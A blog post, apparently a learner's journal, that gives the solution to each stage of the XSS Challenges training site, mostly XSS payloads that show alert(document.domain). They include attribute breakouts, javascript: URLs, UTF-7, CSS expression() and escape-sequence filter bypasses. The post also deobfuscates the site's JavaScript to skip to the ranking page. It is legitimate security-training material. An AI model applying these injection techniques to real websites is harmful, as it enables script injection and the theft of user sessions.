XSS Challenges

Here’s my journal to solve all the XSS Challenges writed  by yamagata21 on http://xss-quiz.int21h.jp/, This is an starter level to people who want to learn some cross-site scripting and its several ways to inject on differents browsers.

XSS Challenges http://xss-quiz.int21h.jp

Stage1: http://xss-quiz.int21h.jp
Solution: <script>alert(document.domain);</script>

Stage2: http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70
Solution: "><script>alert( alert(document.domain))</script>

Stage3: http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d
Solution: The input in text box is properly escaped ("><script>alert(document.domain);</script> in select)

Stage4: http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e
Solution: "><script>alert(document.domain);</script> in hidden field

Stage5: http://xss-quiz.int21h.jp/stage--5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf
Solution: " onmouseover="alert(document.domain);" type="text changing lenght in input text

Stage6: http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c
Solution: " onmouseover="alert(document.domain);"

Stage7: http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105
Solution: x onmouseover=alert(document.domain);

Stage8: http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0
Solution: javascript:alert(document.domain);

Stage9: utf-7: Not working for me, extracted next level from deobfusucate url.
http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25

Solution:+ACI- onmouseover=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp

Stage10: http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276
Solution: " onmouseover=alert(document.domdomainain); x="

Stage11: http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3
Solution: "><a href="javascr	ipt:alert(document.domain);">XSS</a>

Passed with IE
Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Solution: ``onmouseover=alert(document.domain);

Passed with IE
Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Solution: xss:expression(alert(document.domain));"

Passed with IE
Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Solution: xss:expre/**/ssion(alert(document.domain));"

Stage15: http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726
Solution: \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage16: http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7
Solution: \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Skipped: (Old IE not avalaible)
http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056
http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3

Stage19: http://xss-quiz.int21h.jp/stage_--19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce
Solution: It's DOMXSS Twitter's bug (24 Sept.2010) -- #!javascript:alert(document.domain)

Clear Stage: Need to entry the ranking deobfuscating js on this part of the code:
ty = "";
o = unescape("foejoh");
for (var i = 0; i < o.length; i++) {
var y = o.charCodeAt(i);
ty += String.fromCharCode(y - 1)
}
ty = escape(ty);
if (ty == "ending") {
sj = "\062\060";
alert("Congratulations!! All Stages Clear!!!");
alert("\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php");
document.location = "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php"
} else {
document.all("msg").innerHTML = "<span id='h3'>Congratulations!!</span>   " + "Next stage <a href=\"" + ty + "\">" + ty + "</a>."
}

so  "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php" is RankIng20.php :-)

Final URL that allow entry directly in the clear stage. http://xss-quiz.int21h.jp/RankIng20.php
Rankinghttp://xss-quiz.int21h.jp/ranking.php

 

final

 

 

 

 

No hay contenido relacionado



1 comentario

Deja una respuesta

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.